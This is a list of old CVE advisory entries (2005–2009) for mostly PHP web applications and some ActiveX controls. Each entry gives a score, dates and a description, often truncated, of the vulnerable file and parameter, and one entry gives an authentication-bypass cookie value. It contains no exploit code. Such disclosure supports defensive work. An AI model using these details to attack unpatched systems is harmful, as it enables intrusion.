CVE-2009-2784 9.3
Multiple directory traversal vulnerabilities in dit.cms 1.3, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the path parameter to index.php in (1) install/, (2) menus/left_r
17-08-2009 - 00:00 17-08-2009 - 12:30
CVE-2009-2736 6.5
Static code injection vulnerability in admin.php in sun-jester OpenNews 1.0 allows remote authenticated administrators to inject arbitrary PHP code into config.php via the "Overall Width" field in a setconfig action.
11-08-2009 - 00:00 11-08-2009 - 06:30
CVE-2009-2735 6.8
SQL injection vulnerability in admin.php in sun-jester OpenNews 1.0, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
11-08-2009 - 00:00 11-08-2009 - 06:30
CVE-2008-6906 4.3
Cross-site scripting (XSS) vulnerability in index.php in BabbleBoard 1.1.6 allows remote attackers to inject arbitrary web script or HTML via the username.
06-08-2009 - 00:00 06-08-2009 - 13:30
CVE-2008-6905 6.0
Cross-site request forgery (CSRF) vulnerability in index.php in BabbleBoard 1.1.6 allows remote authenticated users to hijack the authentication of administrators for requests that delete (1) categories or (2) groups; (3) ban users; or (4) delete use
06-08-2009 - 00:00 06-08-2009 - 13:30
CVE-2009-2382 7.5
admin.php in phpMyBlockchecker 1.0.0055 allows remote attackers to bypass authentication and gain administrative access by setting the PHPMYBCAdmin cookie to LOGGEDIN.
16-07-2009 - 00:00 08-07-2009 - 11:30
CVE-2009-2263 7.5
Directory traversal vulnerability in index.php in Awesome PHP Mega File Manager 1.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter. NOTE: in some environments, this can be leveraged for
30-06-2009 - 00:00 30-06-2009 - 06:30
CVE-2009-2154 6.8
SQL injection vulnerability in admin/login.php in Impleo Music Collection 2.0, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2153 4.3
Cross-site scripting (XSS) vulnerability in index.php in Impleo Music Collection 2.0 allows remote attackers to inject arbitrary web script or HTML via the sort parameter.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2152 7.5
SQL injection vulnerability in a_index.php in AdaptWeb 0.9.2 allows remote attackers to execute arbitrary SQL commands via the CodigoDisciplina parameter in a TopicosCadastro1 action.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2151 5.0
Directory traversal vulnerability in index.php in AdaptWeb 0.9.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the newlang parameter.
23-06-2009 - 00:00 22-06-2009 - 10:30
CVE-2009-2130 5.0
Elvin 1.2.0 allows remote attackers to read the PHP source code of (1) login.ei, (2) jump_bug.ei, or (3) create_account.ei in inc/ via a direct request.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2129 6.8
Cross-site request forgery (CSRF) vulnerability in login.php in Elvin 1.2.0 allows remote attackers to hijack the authentication of arbitrary users via a logout action.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2127 4.3
Cross-site scripting (XSS) vulnerability in show_activity.php in Elvin 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2124 7.5
Directory traversal vulnerability in page.php in Elvin 1.2.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the id parameter.
22-06-2009 - 00:00 19-06-2009 - 14:00
CVE-2009-2111 10.0
Static code injection vulnerability in add_reg.php in DB Top Sites 1.0 allows remote attackers to inject arbitrary PHP code via a crafted (1) url and (2) location parameter.
19-06-2009 - 00:00 18-06-2009 - 17:30
CVE-2009-2110 7.6
Multiple directory traversal vulnerabilities in DB Top Sites 1.0, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the u parameter to (1) full.php, (2) index.php, and (3) con
19-06-2009 - 00:00 18-06-2009 - 17:30
CVE-2009-2096 7.5
SQL injection vulnerability in house/listing_view.php in phpCollegeExchange 0.1.5c allows remote attackers to execute arbitrary SQL commands via the itemnr parameter.
18-06-2009 - 00:00 17-06-2009 - 13:30
CVE-2009-1406 6.8
Directory traversal vulnerability in cms_detect.php in TotalCalendar 2.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the include parameter.
15-06-2009 - 00:00 24-04-2009 - 10:30
CVE-2009-1952 6.8
Multiple SQL injection vulnerabilities in the administrative login feature in PropertyMax Pro FREE 0.3, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
08-06-2009 - 00:00 05-06-2009 - 17:30
CVE-2009-1951 4.3
Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action.
08-06-2009 - 00:00 05-06-2009 - 17:30
CVE-2009-1916 10.0
dig.php in GScripts.net DNS Tools allows remote attackers to execute arbitrary commands via shell metacharacters in the ns parameter.
05-06-2009 - 00:00 04-06-2009 - 13:30
CVE-2009-1817 9.3
Multiple buffer overflows in DigiMode Maya 1.0.2 allow remote attackers to execute arbitrary code via a long string in a malformed (1) .m3u or (2) .m3l playlist file.
01-06-2009 - 00:00 29-05-2009 - 12:30
CVE-2009-1519 5.0
Directory traversal vulnerability in index.php in Pecio CMS 1.1.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the language parameter.
16-05-2009 - 01:32 04-05-2009 - 15:00
CVE-2009-1486 7.5
Directory traversal vulnerability in pmscript.php in Flatchat 3.0 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the with parameter.
13-05-2009 - 01:28 29-04-2009 - 14:30
CVE-2009-1625 6.8
Directory traversal vulnerability in index.php in Thickbox Gallery 2 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ln parameter.
13-05-2009 - 00:00 12-05-2009 - 12:30
CVE-2009-1607 4.3
Cross-site scripting (XSS) vulnerability in the administrator panel in phpForm.net LinkBase 2.0 allows remote attackers to inject arbitrary web script or HTML via the username in a registration, which is not properly handled when the administrator ac
12-05-2009 - 00:00 11-05-2009 - 16:00
CVE-2009-1550 5.0
Zakkis Technology ABC Advertise 1.0 does not properly restrict access to admin.inc.php, which allows remote attackers to obtain the administrator login name and password via a direct request.
07-05-2009 - 00:00 06-05-2009 - 11:30
CVE-2009-1405 6.8
Directory traversal vulnerability in index.php in PastelCMS 0.8.0, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the set_lng parameter.
24-04-2009 - 00:00 24-04-2009 - 10:30
CVE-2009-1404 6.8
SQL injection vulnerability in admin.php in PastelCMS 0.8.0, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the user (Username) parameter.
24-04-2009 - 00:00 24-04-2009 - 10:30
CVE-2009-1369 5.0
moziloCMS 1.11 allows remote attackers to obtain sensitive information via the (1) gal[] parameter to gallery.php, (2) page[] and (3) cat[] parameter to index.php, or (4) file[] parameter to download.php, which reveals the installation path in an err
23-04-2009 - 00:00 22-04-2009 - 17:30
CVE-2009-1368 7.5
Directory traversal vulnerability in index.php in moziloCMS 1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter. NOTE: this might be the same issue as CVE-2008-6126.2, which may have been fixed in 1.10.3.
23-04-2009 - 00:00 22-04-2009 - 17:30
CVE-2009-1367 4.3
Cross-site scripting (XSS) vulnerability in index.php in moziloCMS 1.11 allows remote attackers to inject arbitrary web script or HTML via the query parameter in search action, a different issue than CVE-2008-6127.2a.
23-04-2009 - 00:00 22-04-2009 - 17:30
CVE-2009-1361 10.0
dig.php in GScripts.net DNS Tools allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
23-04-2009 - 00:00 22-04-2009 - 14:30
CVE-2008-6726 6.0
Multiple directory traversal vulnerabilities in CMScout 2.06, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the bit parameter to (1) admin.php and (2) index.php, different
17-04-2009 - 10:48 17-04-2009 - 10:08
CVE-2009-1319 7.5
Directory traversal vulnerability in includes/ini.inc.php in GuestCal 2.1 allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the lang parameter to index.php.
17-04-2009 - 00:00 17-04-2009 - 10:08
CVE-2008-6725 6.0
Multiple SQL injection vulnerabilities in CMScout 2.06 allow remote authenticated users to execute arbitrary SQL commands via the id parameter to (1) index.php in a mythings page (mythings.php) and (2) the users page in admin.php.
17-04-2009 - 00:00 17-04-2009 - 10:08
CVE-2009-1248 7.5
Multiple PHP remote file inclusion vulnerabilities in Acute Control Panel 1.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the theme_directory parameter to (1) container.php and (2) header.php in themes/.
07-04-2009 - 00:00 06-04-2009 - 12:30
CVE-2009-1247 7.5
SQL injection vulnerability in login.php in Acute Control Panel 1.0.0 allows remote attackers to execute arbitrary SQL commands via the username parameter.
07-04-2009 - 00:00 06-04-2009 - 12:30
CVE-2005-2813 5.0
Directory traversal vulnerability in FlatNuke 2.5.6 and possibly earlier allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) characters in the id parameter to the read mod in index.php.
03-04-2009 - 00:40 07-09-2005 - 14:03
CVE-2009-1038 6.5
Multiple SQL injection vulnerabilities in YAP Blog 1.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) image_id parameter to comments.php, and remote authenticated administrators to execute arbitrary SQL commands via the (2) us
02-04-2009 - 01:45 20-03-2009 - 14:30
CVE-2009-1025 7.5
PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.
26-03-2009 - 00:00 19-03-2009 - 20:30
CVE-2009-1024 7.5
Multiple SQL injection vulnerabilities in Beerwin PHPLinkAdmin 1.0 allow remote attackers to execute arbitrary SQL commands via the linkid parameter to edlink.php, and unspecified other vectors.
26-03-2009 - 00:00 19-03-2009 - 20:30
CVE-2008-3593 7.5
Directory traversal vulnerability in index.php in SyzygyCMS 0.3 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.
18-03-2009 - 01:40 11-08-2008 - 19:41
CVE-2008-3859 5.0
Davlin Thickbox Gallery 2 allows remote attackers to obtain the administrative username and MD5 password hash via a direct request to conf/admins.php.
13-03-2009 - 01:39 29-08-2008 - 12:41
CVE-2008-6336 4.3
Directory traversal vulnerability in download.php in Text Lines Rearrange Script 1.0, when register_globals is enabled, allows remote attackers to read arbitrary local files via directory traversal sequences in the filename parameter.
02-03-2009 - 00:00 27-02-2009 - 12:30
CVE-2009-0735 5.1
Directory traversal vulnerability in lib/classes/message_class.php in Papoo CMS 3.6, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to read and possibly execute arbitrary files via a .. (dot dot) in the pfa
25-02-2009 - 00:00 25-02-2009 - 15:30
CVE-2008-3924 4.3
The "Make a backup" functionality in Content Management Made Easy (CMME) 1.12 stores sensitive information under the web root with insufficient access control, which allows remote attackers to discover (1) account names and (2) password hashes via a
17-02-2009 - 01:50 04-09-2008 - 14:41
CVE-2009-0571 5.0
admin.php in Ninja Designs Mailist 3.0 stores backup copies of maillist.php under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the backup directory.
17-02-2009 - 00:00 13-02-2009 - 12:30
CVE-2009-0570 5.1
Directory traversal vulnerability in send.php in Ninja Designs Mailist 3.0, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the load paramet
17-02-2009 - 00:00 13-02-2009 - 12:30
CVE-2007-4814 7.5
Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argu
05-02-2009 - 01:30 11-09-2007 - 15:17
CVE-2009-0383 6.4
delete.php in Max.Blog 1.0.6 does not properly restrict access, which allows remote attackers to delete arbitrary blog posts via a direct request.
02-02-2009 - 00:00 02-02-2009 - 14:30
CVE-2008-4548 9.3
Stack-based buffer overflow in the PTZCamPanelCtrl ActiveX control (CamPanel.dll) in RTS Sentry 2.1.0.2 allows remote attackers to execute arbitrary code via a long second argument to the ConnectServer method.
29-01-2009 - 01:56 14-10-2008 - 14:12
CVE-2008-4526 10.0
Multiple directory traversal vulnerabilities in CCMS 3.1 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the skin parameter to (1) index.php, (2) forums.php, (3) admin.php, (4) header.php, (5) pages/story.php
29-01-2009 - 01:56 09-10-2008 - 14:14
CVE-2008-4522 7.5
Multiple directory traversal vulnerabilities in JMweb MP3 Music Audio Search and Download Script allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the src parameter to (1) listen.php and (2) download.php.
29-01-2009 - 01:56 09-10-2008 - 14:14
CVE-2008-4158 6.8
Multiple directory traversal vulnerabilities in index.php in Zanfi CMS lite 1.2 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) flag and (2) inc parameters.
29-01-2009 - 01:55 22-09-2008 - 14:34
CVE-2008-4075 6.8
Directory traversal vulnerability in index.php in D-iscussion Board 3.01 allows remote attackers to read arbitrary files via a .. (dot dot) in the topic parameter.
29-01-2009 - 01:55 15-09-2008 - 11:14
CVE-2008-3925 4.3
Cross-site request forgery (CSRF) vulnerability in admin.php in Content Management Made Easy (CMME) 1.12 allows remote attackers to trigger the logout of an administrative user via a logout action.
29-01-2009 - 01:54 04-09-2008 - 14:41
CVE-2008-3923 4.3
Multiple cross-site scripting (XSS) vulnerabilities in statistics.php in Content Management Made Easy (CMME) 1.12 allow remote attackers to inject arbitrary web script or HTML via the (1) page and (2) year parameters in an hstat_year action.
29-01-2009 - 01:54 04-09-2008 - 14:41
CVE-2007-5845 7.5
Directory traversal vulnerability in error.php in GuppY 4.6.3, 4.5.16, and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the id parameter. NOTE: this can be leveraged to bypass authentication and
15-11-2008 - 02:02 06-11-2007 - 16:46
CVE-2007-5070 10.0
Heap-based buffer overflow in the EasyMailMessagePrinter ActiveX control in emprint.DLL 6.0.1.0 in the Quiksoft EasyMail MessagePrinter Object allows remote attackers to execute arbitrary code via a long string in the first argument to the SetFont me
15-11-2008 - 01:59 24-09-2007 - 19:17
CVE-2007-3167 7.6
Stack-based buffer overflow in the Vivotek Motion Jpeg ActiveX control (aka MjpegControl) in MjpegDecoder.dll 2.0.0.13 allows remote attackers to execute arbitrary code via a long PtzUrl property value.
15-11-2008 - 01:51 11-06-2007 - 18:30
CVE-2007-2667 9.3
Buffer overflow in the DB Software Laboratory VImpX ActiveX control in VImpX.ocx 4.7.3 allows remote attackers to execute arbitrary code via a long LogFile parameter.
15-11-2008 - 01:49 14-05-2007 - 19:19
CVE-2007-1292 7.5
SQL injection vulnerability in inlinemod.php in Jelsoft vBulletin before 3.5.8, and before 3.6.5 in the 3.6.x series, might allow remote authenticated users to execute arbitrary SQL commands via the postids parameter. NOTE: the vendor states that th
15-11-2008 - 01:44 06-03-2007 - 19:19
CVE-2007-2080 7.5
Multiple SQL injection vulnerabilities in XAMPP 1.6.0a for Windows allow remote attackers to execute arbitrary SQL commands via unspecified vectors in certain test scripts.
13-11-2008 - 01:37 17-04-2007 - 23:19
CVE-2007-2079 9.3
The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a library buffer overflow and execute arbitrary code via a long
13-11-2008 - 01:37 17-04-2007 - 23:19
CVE-2005-4218 7.5
SQL injection vulnerability in forum.php in PHPWebThings 1.4 allows remote attackers to execute arbitrary SQL commands via the msg parameter, a different vulnerability than CVE-2005-3585.
10-09-2008 - 15:51 14-12-2005 - 06:03
CVE-2007-2431 6.8
Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting (XSS) and possibly other attacks by modifying critical variables such as $_SERVER, as demo
05-09-2008 - 17:23 01-05-2007 - 20:19
CVE-2007-1709 4.3
Buffer overflow in the confirm_phpdoc_compiled function in the phpDOC extension (PECL phpDOC) in PHP 5.2.1 allows context-dependent attackers to execute arbitrary code via a long argument string.
05-09-2008 - 17:21 26-03-2007 - 21:19
CVE-2007-1475 5.4
Multiple buffer overflows in the (1) ibase_connect and (2) ibase_pconnect functions in the interbase extension in PHP 4.4.6 and earlier allow context-dependent attackers to execute arbitrary code via a long argument.
05-09-2008 - 17:20 16-03-2007 - 17:19
CVE-2007-1413 7.5
Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent attackers to execute arbitrary code via a long value in the third argument (object
05-09-2008 - 17:20 12-03-2007 - 19:19
CVE-2007-1412 7.8
The cpdf_open function in the ClibPDF (cpdf) extension in PHP 4.4.6 allows context-dependent attackers to obtain sensitive information (script source code) via a long string in the second argument.
05-09-2008 - 17:20 12-03-2007 - 19:19
CVE-2007-1401 6.9
Buffer overflow in the crack extension (CrackLib), as bundled with PHP 4.4.6 and other versions before 5.0.0, might allow local users to gain privileges via a long argument to the crack_opendict function.
05-09-2008 - 17:20 10-03-2007 - 17:19
CVE-2006-7080 4.3
Directory traversal vulnerability in the avatar upload feature in exV2 2.0.4.3 and earlier allows remote attackers to delete arbitrary files via ".." sequences in the old_avatar parameter.
05-09-2008 - 17:16 02-03-2007 - 16:18
CVE-2006-7079 6.8
Variable extraction vulnerability in include/common.php in exV2 2.0.4.3 and earlier allows remote attackers to overwrite arbitrary program variables and conduct directory traversal attacks to execute arbitrary code by modifying the $xoopsOption['page
05-09-2008 - 17:16 02-03-2007 - 16:18
CVE-2006-4450 5.1
usercp_avatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request.
05-09-2008 - 17:09 29-08-2006 - 21:04
CVE-2006-3608 4.6
The Gallery module in Simone Vellei Flatnuke 2.5.7 and earlier, when Gallery uploads are enabled, does not restrict the extensions of uploaded files that begin with a GIF header, which allows remote authenticated users to execute arbitrary PHP code v
05-09-2008 - 17:07 18-07-2006 - 11:46
CVE-2006-3532 5.1
PHP file inclusion vulnerability in includes/edit_new.php in Pivot 1.30 RC2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a FTP URL or full file path in the Paths[extensions_path] parameter.
05-09-2008 - 17:07 12-07-2006 - 17:05
CVE-2006-3105 5.0
CRLF injection vulnerability in Bitweaver 1.3 allows remote attackers to conduct HTTP response splitting attacks by via CRLF sequences in multiple unspecified parameters that are injected into HTTP headers, as demonstrated by the BWSESSION parameter
05-09-2008 - 17:06 20-06-2006 - 21:02
CVE-2006-2889 5.1
Multiple SQL injection vulnerabilities in index.php in Pixelpost 1-5rc1-2 and earlier allow remote attackers to execute arbitrary SQL commands, and leverage them to gain administrator privileges, via the (1) category or (2) archivedate parameter.
05-09-2008 - 17:05 07-06-2006 - 06:02
CVE-2006-2406 2.6
Directory traversal vulnerability in bb_lib/abbc.css.php in Unclassified NewsBoard (UNB) 1.5.3-d and possibly earlier versions, when register_globals is enabled, allows remote attackers to include arbitrary files via .. (dot dot) sequences and a trai
05-09-2008 - 17:04 16-05-2006 - 06:02
CVE-2006-1916 6.8
Multiple cross-site scripting (XSS) vulnerabilities in profile.php in DbbS 2.0-alpha and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ulocation or (2) uhobbies parameters.
05-09-2008 - 17:03 20-04-2006 - 14:06
CVE-2006-1793 7.6
Directory traversal vulnerability in runCMS 1.2 and earlier allows remote attackers to read arbitrary files via the bbPath[path] parameter to (1) class.forumposts.php and (2) forumpollrenderer.php. NOTE: this issue is closely related to CVE-2006-0659
05-09-2008 - 17:02 17-04-2006 - 06:02
CVE-2006-1164 7.5
Nodez 4.6.1.1 and earlier stores sensitive data in the list.gtdat file under the web document root with insufficient access control, which allows remote attackers to obtain usernames and password hashes by directly accessing list.gtdat.
05-09-2008 - 17:01 12-03-2006 - 16:02
CVE-2006-0894 4.3
Multiple cross-site scripting (XSS) vulnerabilities in NOCC Webmail 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the html_error_occurred parameter in error.php, (2) html_filter_select parameter in filter_prefs.php, (3) ht
05-09-2008 - 17:00 25-02-2006 - 06:02
CVE-2006-0891 5.0
Multiple directory traversal vulnerabilities in NOCC Webmail 1.0 allow remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing NULL (%00) byte in (1) the _SESSION['nocc_theme'] parameter in (a) html/footer.php; and (2) t
05-09-2008 - 17:00 25-02-2006 - 06:02
CVE-2006-0786 5.1
Incomplete blacklist vulnerability in include.php in PHPKIT 1.6.1 Release 2 and earlier, with allow_url_fopen enabled, allows remote attackers to conduct PHP remote file include attacks via a path parameter that specifies a (1) UNC share or (2) ftps
05-09-2008 - 17:00 19-02-2006 - 06:02
CVE-2006-0644 7.5
Multiple directory traversal vulnerabilities in install.php in CPG-Nuke Dragonfly CMS (aka CPG Dragonfly CMS) 9.0.6.1 allow remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in (
05-09-2008 - 16:59 10-02-2006 - 06:02
CVE-2005-4593 7.5
PHP remote file inclusion vulnerability in phpDocumentor 1.3.0 rc4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary code via a URL in the (1) FORUM[LIB] parameter in Documentation/tests/bug-559668.php and (2
05-09-2008 - 16:57 31-12-2005 - 00:00
CVE-2005-4554 7.5
Multiple SQL injection vulnerabilities in DEV web management system 1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat parameter in an openforum action (openforum.php) in index.php, (2) cat parameter in getfile.p
05-09-2008 - 16:57 28-12-2005 - 06:03
CVE-2005-4449 4.0
verify.php in FlatNuke 2.5.6 allows remote authenticated administrators to modify arbitrary PHP files by setting the file parameter to an arbitrary file and injecting the code into the body parameter. NOTE: if a FlatNuke administrator is normally as
05-09-2008 - 16:56 21-12-2005 - 06:03
CVE-2005-4208 5.0
Directory traversal vulnerability in Flatnuke 2.5.6 allows remote attackers to access arbitrary files via a .. (dot dot) and null byte (%00) in the id parameter of the read module.
05-09-2008 - 16:56 13-12-2005 - 06:03
CVE-2005-4171 7.5
The "Upload new image" command in the "Manage Images" eFiction 1.1, when members are allowed to upload images, allows remote attackers to execute arbitrary PHP code by uploading a filename with a .php extension that contains a GIF header, which passe
05-09-2008 - 16:56 11-12-2005 - 16:03
CVE-2005-4155 7.5
registration.PHP in ATutor 1.5.1 pl2 allows remote attackers to execute arbitrary SQL commands via an e-mail address that ends in a NULL character, which bypasses the PHP regular expression check. NOTE: it is possible that this is actually a bug in P
05-09-2008 - 16:56 10-12-2005 - 21:03
CVE-2005-4087 7.5
PHP remote file include vulnerability in acceptDecline.php in Sugar Suite Open Source Customer Relationship Management (SugarCRM) 4.0 beta and earlier allows remote attackers to execute arbitrary PHP code via a URL in the beanFiles array parameter.
05-09-2008 - 16:56 08-12-2005 - 06:03
CVE-2005-3010 7.5
Direct static code injection vulnerability in the flood protection feature in inc/shows.inc.php in CuteNews 1.4.0 and earlier allows remote attackers to execute arbitrary PHP code via the HTTP_CLIENT_IP header (Client-Ip), which is injected into data
05-09-2008 - 16:53 21-09-2005 - 16:03
CVE-2005-2814 4.3
Cross-site scripting (XSS) vulnerability in FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the usr parameter in a vis_reg operation to index.php.
05-09-2008 - 16:52 07-09-2005 - 14:03
CVE-2005-2488 4.3
Cross-site scripting (XSS) vulnerability in Web Content Management News System allows remote attackers to inject arbitrary web script or HTML via (1) the strRootpath parameter to validsession.php or (2) the strTable parameter to Admin/News/List.php.
05-09-2008 - 16:51 07-08-2005 - 00:00
CVE-2005-2397 4.3
Cross-site scripting (XSS) vulnerability in guestbook.php in phpBook 1.46 allows remote attackers to inject arbitrary web script or HTML via the admin parameter.
05-09-2008 - 16:51 27-07-2005 - 00:00
Back to Top Mark selected
Back to Top